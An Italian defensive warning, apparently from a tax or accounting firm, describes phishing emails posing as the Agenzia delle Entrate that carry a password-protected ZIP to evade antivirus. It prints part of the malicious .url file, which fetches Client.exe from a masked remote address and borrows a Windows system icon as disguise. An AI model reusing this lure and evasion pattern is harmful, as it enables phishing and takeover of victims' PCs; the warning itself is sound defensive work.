Ancora pericolosi attacchi informatici all’orizzonte, soprattutto per le imprese che (per ovvie ragioni) hanno a che fare con l’Agenzia delle Entrate.
Girano mail il cui soggetto è diverso, ma potrebbe essere del tipo: “Commissione di vigilanza sull’anagrafe tributaria”.
Il testo è riportato in un italiano che potrebbe sembrare maccheronico (in realtà si tratta con tutta evidenza di pirati stranieri che cercano di tradurre dei testi in italiano). Dice che dall’esame dei dati e versamenti relativi alla “Divulgazione delle eliminazioni periodiche Iva” (molto probabilmente intendendo le comunicazioni periodiche iva, le cosiddette “LIPE”), presentate per “Il trimestre 2023”, risultano incoerenze. Continua riportando che “le notificazioni relative alle sconvenienze riscontrate…”, con un italiano alquanto sgrammaticato. Infine viene specificato che l’ultima versione di queste “sconvenienze” sarebbe allegata alla mail in un archivio di cui viene data la password per l’apertura (nel caso che abbiamo riscontrato: agenzia2023).
Fermo restando che l’Agenzia delle Entrate non distribuisce documenti ufficiali per mail (al massimo via PEC), la presenza di una archivio (ZIP) sotto password è proprio un modo per eludere gli antivirus che tutti abbiamo installato. Infatti già non sempre è facile che l’antivirus, in sede di controllo della posta, riesca a lavorare sui formati “zippati” (soprattutto le versioni gratuite degli antivirus), ma se anche potesse farlo, non conoscendo la password di apertura non potrebbe comunque procedere al controllo e il file potrebbe pericolosamente sfuggire. A quel punto, l’ignaro e distratto utente lo aprirebbe con la password, si troverebbe davanti un pericolosissimo file “.url”, cioè un file che (una volta lanciato) si collega a un indirizzo internet.
Ecco qui di seguito parte del file che abbiamo esaminato:
==========================================
URL=file://xx.xxx.xxx.xx\Scarica\Client.exe
IconFile=C:\Windows\system32\SHELL32.dll
==========================================
Abbiamo nascosto con delle X i numeri dell’indirizzo, onde evitare spiacevoli incidenti.
In sostanza, una volta collegatosi a questo indirizzo, il PC della vittima scarica un eseguibile (client.exe); l’utente, vedendo un’icona molto familiare (il secondo rigo infatti utilizza un file di windows per mascherare la trappola da file innocuo), lancerà questo client che permetterà al pirata di impossessarsi del PC, collegandosi a suo piacimento.
Vi invitiamo a prestare la massima attenzione nell’apertura di mail di cui non avete certezza del mittente.